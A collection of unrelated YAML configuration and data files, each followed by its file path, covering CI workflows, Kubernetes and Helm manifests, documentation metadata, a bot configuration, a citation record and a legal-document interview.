- name: Finish coveralls parallel build
uses: coverallsapp/github-action@master
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
parallel-finished: true
release:
if: "!contains(github.event.commits[0].message, '[skip ci]')"
needs: [commit-lint, code-lint, test-with-node]
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
persist-credentials: false
- name: Setup Node.js environment
uses: actions/setup-node@v2.5.1
with:
node-version: '16'
- name: Install dependencies
run: yarn install --frozen-lockfile
- name: Build
run: yarn build
- name: Disable protection temporary
uses: actions/github-script@v5.0.0
with:
github-token: '${{ secrets.GASTROBOT_TOKEN}}'
script: |
await github.rest.repos.deleteAdminBranchProtection({
repo: '${{ github.event.repository.name }}',
owner: '${{ github.repository_owner }}',
branch: 'main',
});
- run: npx semantic-release
env:
GITHUB_TOKEN: ${{ secrets.GASTROBOT_TOKEN }}
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
- name: Restore protection
uses: actions/github-script@v5.0.0
if: always()
with:
github-token: '${{ secrets.GASTROBOT_TOKEN}}'
script: |
await github.rest.repos.setAdminBranchProtection({
repo: '${{ github.event.repository.name }}',
owner: '${{ github.repository_owner }}',
branch: 'main',
});
|
.github/workflows/main.yml
|
params:
- name: classes
type: string
required: false
description: Classes to add to the interactive map.
- name: uniqueId
type: string
required: true
description: unique id for komponent
- name: title
type: string
required: true
description: title of map component
- name: radioControlsName
type: string
required: true
description: unique name of radio group
- name: checkedTable
type: boolean
required: false
description: if true, radio for table will be checked
- name: indicatorOptions
type: object
required: false
description: indicator options
params:
- name: value
type: string
required: true
description: value for indicator radio
- name: title
type: string
required: true
description: title for indicator radio
- name: mapIframeSrc
type: string
required: true
description: map iframe source
- name: mapIframeTitle
type: string
required: true
description: title for map iframe
- name: tableIframeSrc
type: string
required: true
description: table iframe source
- name: tableIframeTitle
type: string
required: true
description: title for table iframe
- name: dataDownload
type: string
required: false
params:
- name: text
type: string
required: true
description: title for data to download
- name: link
type: string
required: true
description: link to data for download
- name: dataSource
type: string
required: false
description: data source
examples:
- name: " - ukážka mapového komponentu 1"
data:
uniqueId: map-id
title: Počet zaočkovaných ľudí (1. aj 2. dávkou)
mapIframeSrc: "/vzory/interactive-map-sample"
mapIframeTitle: Príkladová mapa na demonštráciu koponentu - interaktívna mapa
tableIframeSrc: "/vzory/interactive-table-sample"
tableIframeTitle: Príkladová tabuľka na demonštráciu koponentu - interaktívna mapa
radioControlsName: interactive-radios-a
dataSource: NCZI
dataDownload:
text: Stiahnuť údaje (CSV, 42 kb)
link: "/public/assets/data/korona.gov.sk.csv"
- name: " - ukážka mapového komponentu 2"
data:
uniqueId: map-id-1
title: Koronavírus na Slovensku
mapIframeSrc: "/vzory/interactive-map-sample"
mapIframeTitle: "Príkladová mapa na demonštráciu koponentu - interaktívna mapa"
tableIframeSrc: "/vzory/interactive-table-sample"
tableIframeTitle: "Príkladová tabuľka na demonštráciu koponentu - interaktívna mapa"
radioControlsName: interactive-radios-b
indicatorOptions:
- title: Celkový stav
value: ''
- title: Počet zaočkovaných 1. dávkou
value: dose1
- title: Počet zaočkovaných 2. dávkou
value: dose2
dataSource: NCZI
dataDownload:
text: Stiahnuť údaje (CSV, 42 kb)
link: "/public/assets/data/korona.gov.sk.csv"
|
src/idsk/components/interactive-map/interactive-map.yaml
|
documentType: LandingData
title: Azure voor containers
metadata:
title: 'Azure voor containers - Quickstarts, zelfstudies, API-verwijzing'
description: 'Aan de slag met containerapps beheren en implementeren met Azure met quickstarts, zelfstudies en hulpprogramma''s voor containers.'
keywords: 'Azure, containers, Docker, API, Kubernetes'
author: dlepow
ms.author: danlep
ms.date: 01/08/2019
ms.topic: article
ms.prod: azure
featureFlags:
- clicktale
ms.technology: azure
ms.devlang: multiple
ms.service: multiple
sections:
- items:
- type: markdown
text: |
Aan de slag met containerapps beheren en implementeren met Azure-hulpprogramma's en -services voor containers.
- title: QuickStarts van vijf minuten
items:
- type: paragraph
text: Leer hoe u containers gebruikt in Azure-services.
- type: list
style: cards
className: cardsM
columns: 2
items:
- href: ../aks/kubernetes-walkthrough.md
title: Een Kubernetes-cluster maken met Azure Kubernetes Service (AKS)
image:
src: /azure/media/index/ContainerService.svg
- href: 'https://docs.microsoft.com/azure/service-fabric/service-fabric-quickstart-containers'
title: Een Windows-containertoepassing implementeren met Service Fabric
image:
src: /azure/media/index/Fabric.svg
- href: 'https://docs.microsoft.com/azure/app-service/containers/quickstart-docker-go'
title: Een in een container geplaatste app maken met Azure Web Apps for Containers
image:
src: 'https://docs.microsoft.com/media/logos/logo_linux.svg'
- href: 'https://docs.microsoft.com/azure/container-registry/container-registry-get-started-azure-cli'
title: Een privé-Docker-register maken met de Azure Container Registry
image:
src: /azure/media/index/container-registry.svg
- href: 'https://docs.microsoft.com/azure/container-instances/container-instances-quickstart'
title: Een container-app op aanvraag uitvoeren in Azure Container Instances
image:
src: /azure/media/index/containerinstances.svg
- title: Zelfstudies met stapsgewijze instructies
items:
- type: paragraph
text: 'Informatie over hoe u containerapps met Azure-services implementeert, beheert en bijwerkt'
- type: list
style: unordered
items:
- html: <a href="/azure/aks/tutorial-kubernetes-prepare-app">Een container bouwen en implementeren in Azure Kubernetes Service</a>
- html: <a href="/azure/service-fabric/service-fabric-host-app-in-a-container">Een .NET-containerapp bouwen en implementeren in Azure Service Fabric</a>
- html: <a href="/azure/app-service/containers/tutorial-multi-container-app">Een app met meerdere containers bouwen in Web App for Containers</a>
- html: <a href="/azure/container-registry/container-registry-tutorial-quick-task">Containerinstallatiekopieën bouwen met Azure Container Registry-taken</a>
- html: <a href="/azure/container-instances/container-instances-tutorial-prepare-app">Een container bouwen en implementeren in Azure Container Instances</a>
- html: <a href="/azure/openshift/tutorial-create-cluster">Een Azure Red Hat OpenShift-cluster maken</a>
- title: Uw vaardigheden ontwikkelen met Microsoft Learn
items:
- type: list
style: cards
className: cardsFTitle
items:
- title: Docker-containers uitvoeren met Azure Container Instances
href: /learn/modules/run-docker-with-azure-container-instances/
image:
src: /learn/achievements/run-docker-with-azure-container-instances.svg
href: /learn/modules/run-docker-with-azure-container-instances/
- title: Containerinstallatiekopieën bouwen en opslaan met Azure Container Registry
href: /learn/modules/build-and-store-container-images/
image:
src: /learn/achievements/build-and-store-container-images.svg
href: /learn/modules/build-and-store-container-images/
|
articles/containers/index.yml
|
language: cpp
# Travis Continuous Integration Build Matrix allows different OS/package/compiler versions to be specified
# Unfortunately, common packages cannot be specified separately, and multidimentional matrix are not yet
# supported, leading to a lot of duplication in the matrix section below.
matrix:
include:
# Ubuntu 12.04 Precise build with GCC
- os: linux
dist: precise
sudo: required
compiler: gcc
env:
- OGRE_HOME=/usr/lib/x86_64-linux-gnu/OGRE-1.7.4
addons:
apt:
packages:
- libogre-dev
- libboost-system-dev
- libglu1-mesa-dev
- libxt-dev
- libopencv-dev
- tcl
- tk
- libboost-system-dev
- libboost-filesystem-dev
# Ubuntu 12.04 Precise build with Clang
- os: linux
dist: precise
sudo: required
compiler: clang
env:
- OGRE_HOME=/usr/lib/x86_64-linux-gnu/OGRE-1.7.4
addons:
apt:
packages:
- libogre-dev
- libboost-system-dev
- libglu1-mesa-dev
- libxt-dev
- libopencv-dev
- tcl
- tk
- libboost-system-dev
- libboost-filesystem-dev
# Ubuntu 14.04 Trusty build with GCC
- os: linux
dist: trusty
compiler: gcc
sudo: required
env:
- OGRE_HOME=/usr/lib/x86_64-linux-gnu/OGRE-1.9.0
addons:
apt:
packages:
- libogre-1.9-dev
- libboost-system-dev
- libglu1-mesa-dev
- libxt-dev
- libopencv-dev
- tcl
- tk
- libboost-system-dev
- libboost-filesystem-dev
# Ubuntu 14.04 Trusty build with Clang
- os: linux
dist: trusty
compiler: clang
sudo: required
env:
- OGRE_HOME=/usr/lib/x86_64-linux-gnu/OGRE-1.9.0
addons:
apt:
packages:
- libogre-1.9-dev
- libboost-system-dev
- libglu1-mesa-dev
- libxt-dev
- libopencv-dev
- tcl
- tk
- libboost-system-dev
- libboost-filesystem-dev
# Setup a X Virtual Framebuffer to allow opening of X display
before_script:
- "export DISPLAY=:99.0"
- "sh -e /etc/init.d/xvfb start"
- sleep 3 # give xvfb some time to start
script:
- mkdir build
- pushd build
- cmake ..
# No unit tests yet
- make
# Collate libhand build artifacts into local "dist" directory (for external applications to link against)
- make install
- popd
# Build examples
- pushd examples
- mkdir build
- pushd build
- cmake ..
- make
- popd
- popd
# Setup runtime link paths (see BUILD.DEBIAN.md)
- export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:${OGRE_HOME}
- sudo ldconfig
# Run LibHand integration test
- ./examples/build/ogre_rendering_test .
|
.travis.yml
|
:freakazoid:
# mode: head - the last block
# mode: irreversible - the block that is confirmed by 2/3 of all block
# producers and is thus irreversible!
:block_mode: irreversible
# Account name for replying.
:account_name: <your Hive bot name>
# Posting wif is used to reply with a comment. See `support/reply.md` to
# customize the comment.
:posting_wif: <your Hive bot posting key>
# Register your bot and get a key: https://www.cleverbot.com/api/
:cleverbot_api_key: <your cleverbot api key>
# List of apps for this bot to ignore (blacklist). It is advisable to ignore
# other instances of freakazoid and all known engagement bots.
:except_apps: freakazoid meep_bot
# List of apps for this bot to pay attention to (whitelist). Useful if you'd
# like to focus only on these apps/sites/tribes. This might also help avoid
# bot-on-bot loops, assuming these bots don't fake their app name.
# :only_apps: hiveblog peakd ecency leofinance stemgeeks weedcash sportstalksocial neoxiancity splintertalk anonramblings
# When someone follows the bot and replies, the bot will follow them, if this
# value is true.
:follow_back: false
# When non-zero, vote for the author only occure after this many minutes.
:unique_author: 1440
# When non-zero, vote for the author while replying (if the author follows
# the bot).
:vote_weight: 0.00 %
# When non-zero, vote for self while replying.
:self_vote_weight: 0.00 %
# Mirror mute account names is a list of accounts that this bot will use to
# get a list of accounts to mute, in addition to this bot's account_name.
# :mirror_mute_account_names:
# If you are running a meeseeker sync, you can enable that for streaming by
# uncommenting this group. If the meeseeker sync is running on another host,
# update the :url: line with the correct address.
#
# See: https://github.com/inertia186/meeseeker
# :meeseeker_options:
# :url: redis://127.0.0.1:6379/0
:chain_options:
:chain: hive
:url: https://api.hive.blog
|
config.yml
|
SDG_GOAL: >-
<p>Goal 17: Strengthen the means of implementation and revitalize the Global
Partnership for Sustainable Development</p>
SDG_TARGET: >-
<p>Target 17.19: By 2030, build on existing initiatives to develop
measurements of progress on sustainable development that complement gross
domestic product, and support statistical capacity-building in developing
countries</p>
SDG_INDICATOR: >-
<p>Indicator 17.19.2: Proportion of countries that (a) have conducted at least
one population and housing census in the last 10 years; and (b) have achieved
100 per cent birth registration and 80 per cent death registration</p>
META_LAST_UPDATE: <p>2016-07-19</p>
SDG_CUSTODIAN_AGENCIES: <p>United Nations Statistics Division (UNSD)</p>
CONTACT_ORGANISATION: <p>United Nations Statistics Division (UNSD)</p>
STAT_CONC_DEF: >-
<p><strong>Definition:</strong></p>
<p>This information only refers to 17.19.2 (a) </p>
<p>The indicator tracks the proportion of countries that have conducted at
least one population and housing census in the last 10 years. This also
includes countries which compile their detailed population and housing
statistics from population registers, administrative records, sample surveys
or other sources or a combination of those sources.</p>
SOURCE_TYPE: >-
<p>ECOSOC resolution E/RES/2015/10 establishing the 2020 World Population and
Housing Census Programme requests the Secretary-General to "monitor and
regularly report to the Statistical Commission on the implementation of the
Programme". In response to this request UNSD regularly monitors the
progress of implementation of population and housing censuses across Member
States. UNSD sends a survey to all countries soliciting detailed metadata on
census methods at three points (beginning, mid, end) over the 10-year spanning
a census decade (currently the 2020 census round covering the years
2015-2024). In addition, information is also collected through the annual
questionnaires sent to countries as part of the UN Demographic Yearbook
collection.</p>
FREQ_COLL: <p>NA </p>
REL_CAL_POLICY: <p>NA </p>
DATA_SOURCE: <p>National Statistical Office or Census Agency</p>
RATIONALE: >-
<p>Population and housing censuses are one of the primary sources of data
needed for formulating, implementing and monitoring policies and programmes
aimed at inclusive socioeconomic development and environmental sustainability.
Population and housing censuses are an important source for supplying
disaggregated data needed for the measurement of progress of the 2030 Agenda
for Sustainable Development, especially in the context of assessing the
situation of people by income, sex, age, race, ethnicity, migratory status,
disability and geographic location, or other characteristics.</p>
<p>In recognition of the above, the ECOSOC resolution E/RES/2015/10
establishing the 2020 World Population and Housing Census Programme urges
Member States to conduct at least one population and housing census during the
period from 2015 to 2024, taking into account international and regional
recommendations relating to population and housing censuses and giving
particular attention to advance planning, cost efficiency, coverage and the
timely dissemination of, and easy access to, census results for national
stakeholders, the United Nations and other appropriate intergovernmental
organizations in order to inform decisions and facilitate the effective
implementation of development plans and programmes.</p>
<p>The indicator tracks the proportion of countries that have conducted at
least one population and housing census in the last 10 years and hence
provides information on the availability of disaggregated population and
housing data needed for the measurement of progress of the 2030 Agenda for
Sustainable Development.</p>
IMPUTATION: |-
<p><strong>• At country level</strong></p>
<p><strong>• At regional and global levels</strong></p>
COVERAGE: |-
<p><strong>Data availability:</strong></p>
<p>NA</p>
<p><strong>Time series:</strong></p>
<p><strong>Disaggregation:</strong></p>
<p>The indicator could be disaggregated by geographic region.</p>
COMPARABILITY: '<p><strong>Sources of discrepancies:</strong></p>'
OTHER_DOC: >-
<p><strong>URL:</strong></p>
<p>http://unstats.un.org/unsd/demographic/sources/census/wphc/default.htm</p>
<p><strong>References:</strong></p>
<p>Resolution adopted by the ECOSOC on 10 June 2015 establishing the 2020
World Population and Housing Census Programme</p>
<p>United Nations Principles and Recommendations for Population and Housing
Censuses, Rev.3</p>
|
translations-metadata/en/17-19-2a.yml
|
{{- if .Capabilities.APIVersions.Has "vcenter-operator.stable.sap.cc/v1" }}
{{- if .Values.vcenter_exporters.enabled }}
{{- if .Values.vcenter_exporters.exporter_types }}
apiVersion: vcenter-operator.stable.sap.cc/v1
kind: VCenterTemplate
metadata:
name: 'vcenter-datacenter-exporter-deployment'
scope: 'datacenter'
{{ $global_values := .Values }}
template: |
{{- range $exporter_type_values := .Values.vcenter_exporters.exporter_types }}{{`
---
kind: Deployment
apiVersion: extensions/v1beta1
metadata:
name: vcenter-exporter-{{ name }}-`}}{{ required ".Values.vcenter_exporters.<exporter_type>.name is missing" $exporter_type_values.name }}{{`
namespace: monsoon3
labels:
system: openstack
service: metrics
spec:
replicas: 1
strategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 1
maxSurge: 1
template:
metadata:
labels:
component: vcenter-exporter-{{ name }}-`}}{{ required ".Values.vcenter_exporters.<exporter_type>.name is missing" $exporter_type_values.name }}{{`
spec:
nodeSelector:
zone: farm
volumes:
- name: maia-etc
configMap:
name: vcenter-exporter-{{ name }}-`}}{{ required ".Values.vcenter_exporters.<exporter_type>.name is missing" $exporter_type_values.name }}{{`
containers:
- name: vcenter-exporter
imagePullPolicy: IfNotPresent
image: `}}{{ required ".Values.vcenter_exporters.docker_repo is missing" $global_values.vcenter_exporters.docker_repo }}/infrastructure-exporters:{{ $global_values.vcenter_exporters.image_version | replace "string:" "" }}{{`
args:
- -f
- /maia-etc/config-{{ name }}-`}}{{ required ".Values.vcenter_exporters.<exporter_type>.name is missing" $exporter_type_values.name }}{{`.yaml
- -t
- `}}{{ $exporter_type_values.name }}{{`
`}}{{- if $global_values.vcenter_exporters.resources.enabled }}{{`
livenessProbe:
exec:
command:
- sh
- -c
- '[ $(ls -l /proc/7/task | wc -l) -lt 10000 ]'
initialDelaySeconds: 45
periodSeconds: 5
resources:
requests:
memory: `}}{{ required ".Values.vcenter_exporters.resources.requests.memory is missing" $global_values.vcenter_exporters.resources.requests.memory | quote }}{{`
limits:
memory: `}}{{ required ".Values.vcenter_exporters.resources.limits.memory is missing" $global_values.vcenter_exporters.resources.limits.memory | quote }}{{`
`}}{{- end }}{{`
volumeMounts:
- mountPath: /maia-etc
name: maia-etc
ports:
- name: metrics
containerPort: `}}{{ required ".Values.vcenter_exporters.prometheus_port is missing" $global_values.vcenter_exporters.prometheus_port | quote}}{{`
`}}
{{- end }}
{{- end }}
{{- end }}
{{- end }}
|
openstack/infra-exporters/vcenter-exporters/templates/vcenter_datacenter_exporter_deployment.yaml
|
pmid: '26347841'
categories:
- name: Symptoms
enabled: true
- name: Case Studies
enabled: true
- name: Therapies
enabled: true
title: >-
Complex Scapular Winging following Total Shoulder Arthroplasty in a Patient
with Ehlers-Danlos Syndrome.
abstract: >-
This is a unique case of a female patient with features of classical and
hypermobile types of Ehlers-Danlos syndrome (EDS) who developed complex
scapular winging from spinal accessory and long thoracic neuropathies. These
neurological problems became manifest after an uncomplicated total shoulder
arthroplasty (TSA). The patient had a complex postoperative course with
extensive work-up in addition to revision shoulder surgery and manipulations
to treat shoulder stiffness. It was eventually suspected that the periscapular
nerve impairments occurred during physical therapy sessions after her TSA.
This interpretation was further supported by genetic evidence that, in
addition to EDS, the patient had an unrecognized genetic propensity for nerve
palsies from stretch or pressure ("hereditary neuropathy with liability to
pressure palsies" (HNPP)). By two years after the TSA the neuropathies had
only partially improved, leaving the patient with persistent scapular winging
and shoulder weakness. With this case we alert surgeons and physical
therapists that patients with EDS can have not only a complicated course after
TSA, but rare concurrent conditions that can further increase the propensity
of neurological injuries that result in compromised shoulder function.
abstractLink: 'https://www.ncbi.nlm.nih.gov/pubmed/26347841'
fullTextLink: 'https://www.ncbi.nlm.nih.gov/pmc/articles/pmid/26347841/'
date: 2015/09
authors:
- name: <NAME>
- name: <NAME>
- name: <NAME>
- name: <NAME>
- name: <NAME>
- name: <NAME>
keywords: []
cites:
- pmid: '23845446'
- pmid: '14996885'
- pmid: '10671123'
- pmid: '21459063'
- pmid: '12365568'
- pmid: '23953851'
- pmid: '22737049'
- pmid: '10426439'
- pmid: '15895289'
- pmid: '8849169'
- pmid: '24787332'
- pmid: '1549236'
- pmid: '22353005'
- pmid: '18196359'
- pmid: '10593673'
- pmid: '21862800'
- pmid: '7619192'
- pmid: '10613148'
- pmid: '22556148'
- pmid: '21988036'
- pmid: '19768768'
- pmid: '14973862'
- pmid: '574227'
- pmid: '17661123'
- pmid: '6087210'
- pmid: '20803633'
- pmid: '17581478'
- pmid: '22746029'
- pmid: '22262391'
- pmid: '18137197'
- pmid: '11932971'
- pmid: '25053156'
- pmid: '22484388'
- pmid: '2721020'
- pmid: '23717249'
- pmid: '16538423'
- pmid: '1791365'
- pmid: '16600507'
- pmid: '25175852'
- pmid: '19468892'
- pmid: '9557891'
- pmid: '168836'
- pmid: '23580420'
- pmid: '9296423'
- pmid: '9814939'
- pmid: '7784290'
- pmid: '11641695'
- pmid: '25149929'
- pmid: '8392146'
- pmid: '20507553'
- pmid: '17983693'
- pmid: '479228'
- pmid: '23762718'
- pmid: '19557868'
- pmid: '3343990'
- pmid: '21978433'
- pmid: '5083867'
- pmid: '8393091'
- pmid: '1851333'
- pmid: '14381453'
- pmid: '1913369'
- pmid: '23920413'
- pmid: '16311893'
citedBy: []
|
src/data/citations/26347841.yml
|
items:
- uid: '@azure/ai-form-recognizer.CommonFieldValue'
name: CommonFieldValue
fullName: CommonFieldValue
children:
- '@azure/ai-form-recognizer.CommonFieldValue.boundingBox'
- '@azure/ai-form-recognizer.CommonFieldValue.confidence'
- '@azure/ai-form-recognizer.CommonFieldValue.fieldElements'
- '@azure/ai-form-recognizer.CommonFieldValue.pageNumber'
- '@azure/ai-form-recognizer.CommonFieldValue.text'
langs:
- typeScript
type: interface
summary: Properties common to the recognized text field
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.boundingBox'
name: boundingBox
fullName: boundingBox
children: []
langs:
- typeScript
type: property
summary: 'Bounding box of the field value, if appropriate.'
optional: true
syntax:
content: 'boundingBox?: Point2D[]'
return:
type:
- '@azure/ai-form-recognizer.Point2D[]'
description: ''
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.confidence'
name: confidence
fullName: confidence
children: []
langs:
- typeScript
type: property
summary: Confidence score.
optional: true
syntax:
content: 'confidence?: number'
return:
type:
- number
description: ''
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.fieldElements'
name: fieldElements
fullName: fieldElements
children: []
langs:
- typeScript
type: property
summary: >-
When includeFieldElements is set to true, a list of references to the
elements constituting
this field.
optional: true
syntax:
content: 'fieldElements?: FormElement[]'
return:
type:
- '@azure/ai-form-recognizer.FormElement[]'
description: ''
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.pageNumber'
name: pageNumber
fullName: pageNumber
children: []
langs:
- typeScript
type: property
summary: The 1-based page number in the input document.
optional: true
syntax:
content: 'pageNumber?: number'
return:
type:
- number
description: ''
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.text'
name: text
fullName: text
children: []
langs:
- typeScript
type: property
summary: Text content of the recognized field.
optional: true
syntax:
content: 'text?: string'
return:
type:
- string
description: ''
package: '@azure/ai-form-recognizer'
references:
- uid: '@azure/ai-form-recognizer.Point2D[]'
name: 'Point2D[]'
spec.typeScript:
- name: Point2D
fullName: Point2D
uid: '@azure/ai-form-recognizer.Point2D'
- name: '[]'
fullName: '[]'
- uid: '@azure/ai-form-recognizer.FormElement[]'
name: 'FormElement[]'
spec.typeScript:
- name: FormElement
fullName: FormElement
uid: '@azure/ai-form-recognizer.FormElement'
- name: '[]'
fullName: '[]'
|
preview-packages/docs-ref-autogen/@azure/ai-form-recognizer/CommonFieldValue.yml
|
initial: True
code: |
set_language('es')
---
modules:
- .espanol
---
metadata:
title: Acuerdo de Confidencialidad
short title: NDA
description: Acuerdo de confidencialidad
authors:
-name: <NAME>
organization: D-Mind Law
revision_date: 01-05-2021
---
mandatory: True
question: Su documento está listo
subquestion: |
Ya puede descargarlo
attachment:
name: NDA ${ parteDiv }
filename: NDA
docx template file: ndaDocassemble.docx
variablename: docNda
buttons:
- Salida: exit
---
objects:
- considerandos: DAList
- rec: DAList.using(object_type=Thing, there_are_any=True, complete_attribute='complete')
---
code: |
rec[i].nombre
rec[i].tipo
rec[i].domicilio
rec[i].representante
rec[i].apellido
rec[i].cargo
rec[i].mail
rec[i].complete = True
rec.counter = i+1
---
question: ¿Desea agregar un considerando?
yesno: considerandos.there_are_any
---
question: Ingrese los considerandos
fields:
- Considerando ${ ordinal(i) }: considerandos[i]
list collect: True
---
question: Ingrese los datos de la Parte Divulgante
fields:
- Nombre de la compañía: parteDiv
- Tipo social: tipoDiv
input type: combobox
choices:
- S.A.
- S.R.L.
- S.A.S.
- Domicilio: domicilioDiv
- Nombre del representante: representanteDiv
- Apellido del representante: apellidoDiv
- Cargo del representante: cargoDiv
- Mail de contacto: mailDiv
datatype: email
---
question: |
% if i == 0:
Ingreso los datos de la Parte Receptora
% else:
Ingrese los datos de la ${ ordinal(i+1, gender='female') } Parte Receptora
% endif
fields:
- Nombre de la compañía: rec[i].nombre
- Tipo social: rec[i].tipo
input type: combobox
choices:
- S.A.
- S.R.L.
- S.A.S.
- Domicilio: rec[i].domicilio
- Nombre del representante: rec[i].representante
- Apellido del representante: rec[i].apellido
- Cargo del representante: rec[i].cargo
- Mail de contacto: rec[i].mail
datatype: email
---
question: ¿Desea agregar otra Parte receptora?
yesno: rec.there_is_another
---
question: ¿Desea agregar una cláusula de Divulgación Reglamentaria?
yesno: divulgacionReglamentaria
help:
label: Ayuda
heading: |
¿Qué es una Cláusula de Divulgación Reglamentaria?
content: |
Una Cláusula de Divulagación Reglamentaria prevé la manera en que alguna de las partes podrá compartir información calificada como confidencial con entidades públicas en caso de que éstas lo requieran. Esta cláusula especifica el mecanismo para compartir información en dichos casos y el procedimiento para hacerlo.
---
question: ¿Cuantos años de vigencia tendrá el acuerdo?
fields:
- Tiempo de Vigencia: tiempoVigencia
datatype: integer
---
question: Indique la ley de que páis será aplicable
fields:
País: leyAplicable
input type: dropdown
choices:
- Argentina
- Chile
- Paraguay
- Uruguay
---
question: Ingrese los tribunales competentes
subquestion: |
Las Partes aceptan irrevocablemente que toda acción legal, juicio o procedimiento que surja del presente Acuerdo o con relación a él será interpuesto y finalmente resuelto por los tribunales [FIELD tribunalCompetente], con renuncia a cualquier otro fuero que pueda corresponder.
fields:
- Tribunales Competentes: tribunalCompetente
---
question: Ingrese el lugar de firma
fields:
- Lugar de Firma: lugarFirma
---
question: ¿En que fecha se firmará el acuerdo?
fields:
- Fecha de Firma: fechaFirma
datatype: date
---
code: |
cantidadPartes = rec.counter+1
cantidadPartesWords = nice_number(cantidadPartes)
depends on:
rec.counter
|
docassemble/dmindlaw/data/questions/nda.yml
|
---
kind: InitializerConfiguration
apiVersion: admissionregistration.k8s.io/v1alpha1
metadata:
name: pvlabel.kubernetes.io
initializers:
- name: pvlabel.kubernetes.io
rules:
- apiGroups:
- ""
apiVersions:
- "*"
resources:
- persistentvolumes
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:cloud-controller-manager
labels:
kubernetes.io/cluster-service: "true"
rules:
- apiGroups:
- ""
resources:
- nodes
verbs:
- '*'
- apiGroups:
- ""
resources:
- nodes/status
verbs:
- patch
- apiGroups:
- ""
resources:
- services
verbs:
- list
- watch
- patch
- apiGroups:
- ""
resources:
- services/status
verbs:
- update
- apiGroups:
- ""
resources:
- events
verbs:
- create
- patch
- update
# For leader election
- apiGroups:
- ""
resources:
- endpoints
verbs:
- create
- apiGroups:
- ""
resources:
- endpoints
resourceNames:
- "cloud-controller-manager"
verbs:
- get
- list
- watch
- update
- apiGroups:
- ""
resources:
- configmaps
verbs:
- create
- apiGroups:
- ""
resources:
- configmaps
resourceNames:
- "cloud-controller-manager"
verbs:
- get
- update
- apiGroups:
- ""
resources:
- serviceaccounts
verbs:
- create
- apiGroups:
- ""
resources:
- secrets
verbs:
- get
- list
# For the PVL
- apiGroups:
- ""
resources:
- persistentvolumes
verbs:
- list
- watch
- patch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: cce-cloud-controller-manager
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:cloud-controller-manager
subjects:
- kind: ServiceAccount
name: cloud-controller-manager
namespace: kube-system
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: cloud-controller-manager
namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ""
labels:
k8s-app: cloud-controller-manager
name: cce-cloud-controller-manager
namespace: kube-system
spec:
replicas: 1
selector:
matchLabels:
k8s-app: cloud-controller-manager
template:
metadata:
labels:
k8s-app: cloud-controller-manager
spec:
tolerations:
- key: node.cloudprovider.kubernetes.io/uninitialized
value: "true"
effect: NoSchedule
serviceAccountName: cloud-controller-manager
containers:
- name: cce-cloud-controller-manager
image: hub.baidubce.com/jpaas-public/cce-cloud-controller-manager:v1.11-latest
imagePullPolicy: Always
args:
- /usr/local/bin/cce-cloud-controller-manager
- --v=4
- --logtostderr=true
- --cloud-config=/etc/kubernetes/cloud.config
- --cloud-provider=cce
- --kubeconfig=/root/.kube/config
- --allocate-node-cidrs=true
# Need change
- --cluster-cidr={{cluster-cidr}}
- --cluster-name=kubernetes
- --route-reconciliation-period=50s
volumeMounts:
- mountPath: /etc/kubernetes/cloud.config
name: cloud-config
readOnly: true
- mountPath: /root/.kube/config
name: kubeconfig
readOnly: true
resources:
requests:
cpu: 200m
volumes:
- name: cloud-config
hostPath:
path: /etc/kubernetes/cloud.config
type: FileOrCreate
- name: kubeconfig
hostPath:
path: /root/.kube/config
type: FileOrCreate
|
manifests/cce-cloud-controller-manager-deployment.yaml
|
---
name: Bizimply
description: Bizimply is the solution to employee time and attendance, scheduling,
reporting and timecards with less paperwork and spreadsheets. Reduce costs by up
to 10%
image: http://kinlane-productions2.s3.amazonaws.com/api-evangelist-site/company/1757_logo.png
created: "2021-02-04"
modified: "2021-02-04"
specificationVersion: "0.14"
x-rank: "7"
x-alexaRank: "863818"
url: https://raw.githubusercontent.com/api-network/organizations/main/bizimply.yaml
tags:
- Schedules
- Have API
- Calendaring
- API Not Found
apis: []
x-common:
- type: x-blog
url: https://www.bizimply.com/blog/category/bar-restaurant/
- type: x-blog
url: http://www.bizimply.com/blog/
- type: x-blog
url: https://www.bizimply.com/blog/
- type: x-blog-rss
url: http://www.bizimply.com/blog/feed/
- type: x-careers
url: https://www.bizimply.com/jobs/
- type: x-crunchbase
url: https://crunchbase.com/organization/bizimply
- type: x-crunchbase
url: http://www.crunchbase.com/company/bizimply
- type: x-customers
url: https://www.bizimply.com/customers/
- type: x-developer
url: http://developer.bizimply.com
- type: x-email
url: <EMAIL>
- type: x-facebook
url: https://www.facebook.com/Bizimply
- type: x-instagram
url: https://www.instagram.com/bizimplyhq/
- type: x-integrations
url: https://www.bizimply.com/integrations/
- type: x-linkedin
url: https://www.linkedin.com/company/bizimply
- type: x-news
url: https://www.bizimply.com/newsletter/
- type: x-partner
url: https://www.bizimply.com/partners/
- type: x-partners
url: https://www.bizimply.com/partner/
- type: x-platform
url: https://www.bizimply.com/employee-engagement-platform/
- type: x-pricing
url: https://www.bizimply.com/pricing/
- type: x-pricing
url: https://go.bizimply.com/pricing
- type: x-support
url: http://help.bizimply.com/
- type: x-twitter
url: https://twitter.com/Bizimply
- type: x-website
url: http://www.bizimply.com
include: []
maintainers:
- FN: <NAME>
x-twitter: apievangelist
email: <EMAIL>
---
|
_data/bizimply.yaml
|
nameWithType: NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend
type: method
members:
- fullName: com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
name: withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
